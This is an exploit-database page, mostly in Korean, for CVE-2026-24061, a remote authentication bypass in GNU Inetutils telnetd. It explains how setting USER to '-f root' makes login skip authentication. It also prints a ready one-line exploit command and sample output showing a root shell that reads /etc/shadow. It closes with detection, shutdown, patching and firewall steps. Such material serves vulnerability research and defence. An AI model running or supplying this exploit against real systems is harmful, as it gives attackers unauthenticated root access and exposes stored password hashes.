Sploitus

Exploit for CVE-2026-24061

kitploit Β· 2026-08-25

Exploit Code

MARKDOWN204 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-0XBLACKASH-CVE-2026-24061
# 🚨 CVE-2026-24061 β€” β€œTelneTD”

![ChatGPT 이미지 2026λ…„ 6μ›” 25일 μ˜€ν›„ 3μ‹œ 3λΆ„ 25초](https://assets.kitploit.com/production/public/readmes/14202/e7b073a62b01a9c5372e6170138f1d17d62f37952b1104dc8d6211b315be4a57.png)

**GNU Inetutils telnetd의 치λͺ…적인 원격 인증 우회**  
2015λ…„μ˜ 유령이 λŒμ•„μ™€ μ—¬μ „νžˆ 텔넷을 μ‹€ν–‰ 쀑인 λͺ¨λ“  것을 μž₯μ•…ν•©λ‹ˆλ‹€.

![CVSS Badge](https://img.shields.io/badge/CVSS-9.8-critical?style=for-the-badge&logo=security&logoColor=white&color=red) ![Status Badge](https://img.shields.io/badge/Status-Actively_Exploited-red?style=for-the-badge&logo=exploit&logoColor=white) ![KEV Badge](https://img.shields.io/badge/CISA_KEV-Added_Jan_2026-blue?style=for-the-badge&logo=cisa) ![Type Badge](https://img.shields.io/badge/Type-Remote_Auth_Bypass-orange?style=for-the-badge)

**인증 제둜. ν™˜κ²½ λ³€μˆ˜ ν•˜λ‚˜. μ¦‰μ‹œ 루트 μ‰˜.**

* * *

## ⚠️ κ°œμš”

**CVE-2026-24061** 은 **GNU Inetutils telnetd ≀ 2.7** μ—μ„œ 발견된 **μ‹¬κ°ν•œ 원격 κΆŒν•œ μƒμŠΉ** μ·¨μ•½μ μž…λ‹ˆλ‹€.

μΈμ¦λ˜μ§€ μ•Šμ€ 원격 κ³΅κ²©μžλŠ” Telnet NEW-ENVIRON μ˜΅μ…˜μ„ 톡해 `USER` ν™˜κ²½ λ³€μˆ˜λ₯Ό `"-f root"`둜 μ„€μ •ν•©λ‹ˆλ‹€.  
telnetdλŠ” 이λ₯Ό **μ •ν™”ν•˜μ§€ μ•Šκ³ ** `/bin/login`에 λ°”λ‘œ μ „λ‹¬ν•©λ‹ˆλ‹€ β†’ login은 `-f root`λ₯Ό 보고 β†’ λͺ¨λ“  인증을 κ±΄λ„ˆλ›°κ³  β†’ 곡격자λ₯Ό **루트 μ‰˜** 에 λΉ λœ¨λ¦½λ‹ˆλ‹€.

μœ„ν—˜ν•œ μ½”λ“œλŠ” **거의 11λ…„**(μ•½ 2015λ…„ 이후) λ™μ•ˆ 쑰용히 μ½”λ“œ νŠΈλ¦¬μ— 남아 μžˆμ—ˆμŠ΅λ‹ˆλ‹€.

> β€œν•˜λ‚˜μ˜ ν™˜κ²½ λ³€μˆ˜. λΉ„λ°€λ²ˆν˜Έ μ—†μŒ. μ™„μ „ν•œ 루트. 2026년에 μ˜€μ‹  것을 ν™˜μ˜ν•©λ‹ˆλ‹€.”

* * *

## πŸ”₯ 심각도 및 영ν–₯

  * **CVSS v3.1 κΈ°λ³Έ 점수** : **9.8 / 심각(Critical)**  
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
  * **곡격 경둜** : λ„€νŠΈμ›Œν¬ (TCP/23)
  * **ν•„μš” κΆŒν•œ** : μ—†μŒ
  * **μ‚¬μš©μž μƒν˜Έμž‘μš©** : μ—†μŒ
  * **μ΅μŠ€ν”Œλ‘œμž‡ μ„±μˆ™λ„** : μ‚¬μ†Œν•¨(λͺ¨λ“  ν…”λ„· ν΄λΌμ΄μ–ΈνŠΈμ—μ„œ ν•œ 쀄 λͺ…λ Ήμ–΄λ‘œ μž‘λ™)



**2026λ…„ 3μ›”μ˜ ν˜„μ‹€** :

  * 1μ›” 말뢀터 λŒ€κ·œλͺ¨ μŠ€μΊλ‹ 및 μ΅μŠ€ν”Œλ‘œμž‡ 관찰됨
  * λ ˆκ±°μ‹œ μž„λ² λ””λ“œ μž₯치, OT μž₯λΉ„, μžŠν˜€μ§„ ν…ŒμŠ€νŠΈ μ„œλ²„κ°€ μ—¬μ „νžˆ κ΄‘λ²”μœ„ν•˜κ²Œ λ…ΈμΆœλ¨
  * 전체 μ‹œμŠ€ν…œ 손상: 자격 증λͺ…, 지속성, λžœμ„¬μ›¨μ–΄ μ§„μž…μ 



* * *

## πŸ•΅οΈ 발견

  * 2026λ…„ 1μ›” μ€‘μˆœ GNU μœ μ§€ κ΄€λ¦¬μžμ—κ²Œ λΉ„κ³΅κ°œ 보고
  * 2026λ…„ 1μ›” 말 oss-securityλ₯Ό 톡해 곡개 곡개
  * GNU Inetutils β‰₯ 2.8μ—μ„œ μˆ˜μ •λ¨(곡개 직후 μΆœμ‹œ)



* * *

## πŸ”¬ 기술 심측 뢄석

telnetdκ°€ λ‹€μŒμ„ ν¬ν•¨ν•˜λŠ” NEW-ENVIRON μ˜΅μ…˜μ„ μˆ˜μ‹ ν•˜λ©΄:

root@kitploit:~
    
    
    USER=-f root
    

ν•΄λ‹Ή 값을 `/bin/login`에 μ „λ‹¬λ˜λŠ” argv에 **직접** μΆ”κ°€ν•©λ‹ˆλ‹€:

root@kitploit:~
    
    
    execve("/bin/login", ["login", "-f", "root", ...], ...)
    

login λ°”μ΄λ„ˆλ¦¬λŠ” `-f root`λ₯Ό λ‹€μŒκ³Ό 같이 ν•΄μ„ν•©λ‹ˆλ‹€:  
β€œμ΄ μ‚¬μš©μžλŠ” 이미 root둜 인증됨 β€” λΉ„λ°€λ²ˆν˜Έ 확인 λΆˆν•„μš”.”

β†’ κ³΅κ²©μžλŠ” **#** ν”„λ‘¬ν”„νŠΈλ₯Ό μ–»μŠ΅λ‹ˆλ‹€. κ²Œμž„ μ˜€λ²„.

**치λͺ…적인 섀계 κ²°μ •** : `-R` / ν™˜κ²½ λ³€μˆ˜ 전달은 κΆŒν•œμ΄ μžˆλŠ” μ‚¬μš©μžλ‘œ μ œν•œλ˜μ§€ μ•Šμ•˜μŠ΅λ‹ˆλ‹€.

* * *

## πŸ“… νƒ€μž„λΌμΈ

* * *

## πŸ–₯️ 영ν–₯λ°›λŠ” μ‹œμŠ€ν…œ

**μ·¨μ•½ν•œ 버전** : GNU Inetutils telnetd **1.9.3 – 2.7**  
**2026λ…„ 일반적인 λŒ€μƒ** :

  * λ ˆκ±°μ‹œ μ‚°μ—…μš© 컨트둀러 및 HMI
  * 였래된 λΌμš°ν„°, μŠ€μœ„μΉ˜, ν”„λ¦°ν„°
  * Debian 기반 μž„λ² λ””λ“œ μ–΄ν”ŒλΌμ΄μ–ΈμŠ€
  * μžŠν˜€μ§„ 개발/ν…ŒμŠ€νŠΈ VM 및 μ»¨ν…Œμ΄λ„ˆ
  * μ—¬μ „νžˆ TCP/23을 λ…ΈμΆœν•˜λŠ” OT κ²Œμ΄νŠΈμ›¨μ΄



**μ•ˆμ „ν•œ μ‹œμŠ€ν…œ** :

  * busybox telnetdλ₯Ό μ‹€ν–‰ν•˜λŠ” μ‹œμŠ€ν…œ
  * Inetutils β‰₯ 2.8
  * 텔넷이 μ™„μ „νžˆ λΉ„ν™œμ„±ν™”/λ°©ν™”λ²½ 차단됨



* * *

## πŸ’₯ μ΅μŠ€ν”Œλ‘œμž‡ μ‹€ν–‰

**ν•œ 쀄 λͺ…λ Ήμ–΄ (telnet ν΄λΌμ΄μ–ΈνŠΈκ°€ μžˆλŠ” λͺ¨λ“  Linux/macOS)** :

root@kitploit:~
    
    
    USER="-f root" telnet -a 192.168.1.50
    

**일반적인 좜λ ₯** :

![telned](https://assets.kitploit.com/production/public/readmes/14202/cedce2ee072b899facea4392144a9c606936eb67c1343627c8ebefa5c462bfd9.png)

root@kitploit:~
    
    
    β”Œβ”€β”€(attackerγ‰Ώkali)-[~]
    └─$ USER="-f root" telnet -a 192.168.1.50
    Trying 192.168.1.50...
    Connected to 192.168.1.50.
    Escape character is '^]'.
    
    Debian GNU/Linux 12 telnetd
    
    root@legacy-box:~# whoami
    root
    root@legacy-box:~# id
    uid=0(root) gid=0(root) groups=0(root)
    root@legacy-box:~# cat /etc/shadow
    ...
    

μ—”ν„° ν‚€ ν•œ 번 λˆ„λ₯΄λ©΄ β€” 전체 루트 μ•‘μ„ΈμŠ€.

* * *

## πŸ›‘οΈ 확인 및 쑰치 (2026λ…„ 3μ›”)

### 1\. μ·¨μ•½ν•œ μ„œλΉ„μŠ€ 탐지

root@kitploit:~
    
    
    telnet localhost 23   # inetutils λ°°λ„ˆ 확인
    inetutils-telnetd --version   # ≀ 2.7이면 μ·¨μ•½
    

### 2\. μ„œλΉ„μŠ€ 쀑단 (κ°€μž₯ ꢌμž₯)

root@kitploit:~
    
    
    systemctl disable --now inetutils-inetd   # λ˜λŠ” telnet.socket
    pkill telnetd && chmod -x /usr/sbin/telnetd
    

### 3\. μ—…λ°μ΄νŠΈ (텔넷을 κΌ­ μœ μ§€ν•΄μ•Ό ν•˜λŠ” 경우만 β€” λ“œλ¬Έ 경우)

root@kitploit:~
    
    
    sudo apt update && sudo apt install --reinstall inetutils-telnetd   # β†’ β‰₯2.8
    

### 4\. λ°©ν™”λ²½ (이쀑 μ•ˆμ „ μž₯치)

root@kitploit:~
    
    
    iptables -A INPUT -p tcp --dport 23 -j DROP
    ufw deny 23/tcp
    

* * *

## πŸ“ˆ ν˜„μž¬ μƒνƒœ β€” 2026λ…„ 3μ›”

  * νŒ¨μΉ˜λ˜μ§€ μ•Šμ€ λ ˆκ±°μ‹œ μž₯μΉ˜μ— λŒ€ν•œ μ΅μŠ€ν”Œλ‘œμž‡ 지속
  * ν…”λ„· μ‚¬μš©λ₯ μ€ 사상 μ΅œμ € β€” κ·ΈλŸ¬λ‚˜ μ‘΄μž¬ν•  경우 μ—¬μ „νžˆ 치λͺ…적
  * μƒνƒœκ³„ κ΅ν›ˆ: **λ ˆκ±°μ‹œ ν”„λ‘œν† μ½œμ€ μ§€λ’°λ°­**



* * *

## πŸŽ“ λŒμ— μƒˆκ²¨μ§„ κ΅ν›ˆ

  * 11λ…„ 된 버그가 μ—¬μ „νžˆ "죽은" μ½”λ“œμ— μˆ¨μ–΄ 있음
  * 루트 생성 λ°”μ΄λ„ˆλ¦¬μ— μ •ν™”λ˜μ§€ μ•Šμ€ μ‚¬μš©μž μž…λ ₯을 μ ˆλŒ€ μ „λ‹¬ν•˜μ§€ 말 것
  * 인자 μ‚½μž… β†’ λ£¨νŠΈλŠ” μ˜μ›ν•¨
  * **텔넷은 2010년에 μ‚¬λΌμ‘Œμ–΄μ•Ό ν–ˆλ‹€. 2026년에 없애라.**